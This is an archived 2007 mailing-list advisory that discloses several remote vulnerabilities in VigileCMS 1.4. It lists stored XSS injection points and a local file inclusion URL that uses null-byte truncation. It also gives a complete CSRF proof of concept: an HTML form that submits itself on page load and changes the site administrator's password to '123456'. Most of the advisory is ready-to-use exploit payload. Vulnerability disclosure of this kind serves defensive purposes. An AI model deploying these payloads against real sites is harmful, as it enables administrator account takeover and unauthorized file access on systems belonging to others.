VigileCMS 1.4 Multiple Remote Vulnerabilities

info Mon, 19 Nov 2007 10:02:45 -0800

VigileCMS 1.4 Multiple Remote Vulnerabilities

---------------------------------------------------------------------------------------


---------------------------------------------------------------------------------------

   Author : DevilAuron (http://devilsnight.altervista.org)


   Vendor : VigileCMS 1.4

   Date   : [16-11-2007] (dd-mm-yyyy)



Permanent Xss:

---------------------------------------------------------------------------------------

http://[site]/[path]/index.php?module=vedipm&inviapm=true

http://[site]/[path]/index.php?module=live_chat

Insert on the message the xss



Local File Inclusion:

---------------------------------------------------------------------------------------

http://[site]/[path]/index.php?module=[somefile]%00



CSRF:

---------------------------------------------------------------------------------------

<form name="cambia" method="post" 
action="http://127.0.0.1/VIGILE_1.4/index.php?module=changepass";>

<input type="password" name="new1" maxlength=20 value="123456">

<input type="password" name="new2" maxlength=20 value="123456">

<input type="hidden" name="pw" value="Cambia la Password">

</form>

<script>document.cambia.submit()</script>

<!-- This change the Admin password -->


---------------------------------------------------------------------------------------

VigileCMS 1.4 Multiple Remote Vulnerabilities

Reply via email to